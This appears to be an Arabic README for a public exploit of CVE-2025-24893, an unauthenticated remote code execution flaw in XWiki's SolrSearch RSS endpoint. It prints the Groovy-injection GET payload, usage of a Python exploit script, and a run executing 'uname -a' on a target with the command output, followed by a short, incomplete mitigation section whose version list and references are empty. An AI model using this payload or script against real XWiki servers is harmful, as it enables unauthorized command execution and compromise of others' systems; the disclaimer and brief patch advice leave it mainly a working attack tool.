
CVE-2025-24893 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) دون مصادقة تؤثر على منصة XWiki.
تسمح هذه الثغرة لأي مستخدم ضيف بحقن وتنفيذ كود Groovy عشوائي — دون مصادقة — عبر طلب RSS مصمم خصيصًا إلى نقطة نهاية SolrSearch.
يؤثر هذا بشكل مباشر على السرية والنزاهة والتوافر للنظام المتأثر.
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H⚠️ إخلاء مسؤولية:
هذا الكود مخصص حصريًا لأغراض التعليم والبحث. الاستخدام غير المصرح به على أنظمة دون إذن صريح قد يشكل انتهاكًا للقانون. المؤلف غير مسؤول عن أي إساءة استخدام أو نشاط ضار يتعلق بهذه الأداة.
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}
يشرح هذا القسم كيفية إعداد وتشغيل سكربت الاستغلال بلغة Python للاستفادة من CVE-2025-24893.
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
[+] Command output 'uname -a':
Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
لإصلاح الثغرة، قم بتحديث XWiki إلى أحد الإصدارات التالية:
إذا لم يكن التحديث ممكنًا فورًا، يمكنك تطبيق إصلاح مؤقت:
SolrSearchMacros.xml (الموجود في Main.SolrSearchMacros) حوالي السطر 955.rawResponse مع ضبط نوع المحتوى على application/xml.macros.vm في السطر 2824 كمرجع.المراجع: